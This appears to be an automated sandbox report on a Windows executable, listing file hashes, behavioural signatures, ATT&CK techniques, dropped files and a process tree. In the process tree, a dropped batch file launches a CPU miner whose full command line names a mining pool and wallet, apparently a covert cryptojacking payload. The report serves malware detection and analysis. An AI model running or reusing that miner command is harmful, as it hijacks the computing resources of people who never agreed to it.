73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
303s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
13/02/2024, 06:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
212	b2e.exe
4576	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4576	cpuminer-sse2.exe
4576	cpuminer-sse2.exe
4576	cpuminer-sse2.exe
4576	cpuminer-sse2.exe
4576	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5712-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5712 wrote to memory of 212	5712	batexe.exe	83
PID 5712 wrote to memory of 212	5712	batexe.exe	83
PID 5712 wrote to memory of 212	5712	batexe.exe	83
PID 212 wrote to memory of 1704	212	b2e.exe	85
PID 212 wrote to memory of 1704	212	b2e.exe	85
PID 212 wrote to memory of 1704	212	b2e.exe	85
PID 1704 wrote to memory of 4576	1704	cmd.exe	87
PID 1704 wrote to memory of 4576	1704	cmd.exe	87

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5712
- C:\Users\Admin\AppData\Local\Temp\6C27.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6C27.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6C27.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6EE6.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1704
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6C27.tmp\b2e.exe

Filesize
8.1MB

MD5
52c37aa2021cfdcdef32c5d3dcb70527

SHA1
2cbe4a0dfa7621b6a407c25dd7908ba5cd834d9d

SHA256
f1d28ada9f1b09674d220db18e11279aa4a927b1efe0f1aa7fc603e74eaff052

SHA512
e77be9bb70df4ba7bb890585ff6d77347bab6f16a96180b03b3a7f5025a95972cb12bd9a2e434e6001eb26a91889347cf48b855ba0761af5a2ba67181342d443

Download Submit
C:\Users\Admin\AppData\Local\Temp\6C27.tmp\b2e.exe

Filesize
3.1MB

MD5
a1c61835c132d15f814272fd67044754

SHA1
6fb402290bca2a33963d7ad81aa71d6972af0b1f

SHA256
ab8ce99d373b80c5ada51890892241b73ba06b8f643a03d40662b35d2cd09a62

SHA512
245289d46054af5bab5bf65406dda6fbd0a6e682da9bf75e6efc761563733fd365875874d763d1a4890eef16235e540b62d9a158194ea3a3a345c5c26e8ba1c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\6C27.tmp\b2e.exe

Filesize
2.7MB

MD5
64f51ef0794b6e92b0eed1c40c67fc8e

SHA1
758450e50a22da0aa6cc62e2ca5dd92b8ea4d418

SHA256
991bd236d281062b7a629b3144db652a89d5d32b414d7a675bfd7f21b436d5cd

SHA512
42b38d17147444908bf3ffa989d11fde2668406c67bd42d44bd7e1082cd4d50c6bf8dd48a078162ddfabc483aac873e1a7563953821f0f0a6a373de3cee5c3c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\6EE6.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.1MB

MD5
b18c88e7eb7971c926cb2393ccaefe21

SHA1
c7ff67df20101ff369d0dc71d9e042091f26e3ef

SHA256
72587d6e6304821aaf072c83b1c340fe554b2b2f350612a6d5ad3c513432513b

SHA512
98bc2a437afb03dd9c021877a31e2fdbecf23f617885ed0c3b6bd20caef6809bfeb4019f63c1f4faf083402be5c776396d078819a82c7cc47f9ad7b6e3fbf22f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.8MB

MD5
71e9e680a496c31cd378fbbad61afcba

SHA1
89e6ebd6b6797b0bec14092197d04363a5b92bc5

SHA256
09ef00415fa06e9f029ab7c20753114dbe23a8b75bee840cad0b9829ccd14aa6

SHA512
4261fc7873b19870e72eb982f4d932d357a3e1c09c24f76e3d77f6a09e1b54538cd71809fcbec8abef6a57e93abb9ef42d006c4fc3fe4a924c77ba656ae5943d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1004KB

MD5
247c1c164200c7a2521104452c9c19f7

SHA1
cd1f714bc6410cc8e981dd5615bd62439ddfb423

SHA256
3ce351af0805a793e1b0d49bf7c73031480afa68c4b55d0d1d82b1ea2075ced2

SHA512
019ffa516488ee0926adb7b22d45b6432582b47cf5083fdbb029d6a1bcd6e6cf27f608620e26d10f8ab2121069b3beb195f935aa41d23e8e87386731398686b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
ab6e28873a9b9d15aece7b8b3abf9218

SHA1
cd6c7ef792a2c973974e5376a1d5eb67c988a176

SHA256
28db0c9d27945b2dfa34c20d041c4c887d4224775b027f16e1cc30451e9f56e2

SHA512
b10903840989d46988ac7e1455ca9e05fe1c57510d179378fa19f95c237ab4acd2efd8a9daac6044e18846178aa2422b9f544aaab38e1245c1993285a4d1e6dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
39cfdae5aec0ca4c3e052373745989d2

SHA1
0566255413617e7f1a64013b02d96b957967a297

SHA256
41c29be9a62630704d20e4b3f3b45a57f8a7620e89b4ca78b39c3471dd7d44ee

SHA512
b60d9b682612c2ee71010904f8e6936194277e22eb5b49dee78402c0847414fb40b1266234840454c53e03e9e6cc9d5110ed47a7229ce9fa8630dc6977678ba9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
747KB

MD5
72e8c8b2f591a16d83301bbea10f137c

SHA1
4973f4fdfa7ff8b737f6b680a4f2f8d4df051880

SHA256
f91cb21680dc01b2a92ee6373c45bc00d5f73d651683740b18b34d26c74cd57a

SHA512
95f471df07fd444a7db5aa563018fd1599f187b2ee2adb3cf668047c090ce7fbe4c46d11cc23bb9437533f37be469507a8a9132f2d8e208106f2ea66b6348f4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/212-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/212-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4576-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4576-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4576-46-0x00000000691A0000-0x0000000069238000-memory.dmp

Filesize
608KB

Download
memory/4576-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4576-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4576-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4576-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4576-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4576-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4576-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4576-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4576-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4576-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4576-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4576-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5712-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download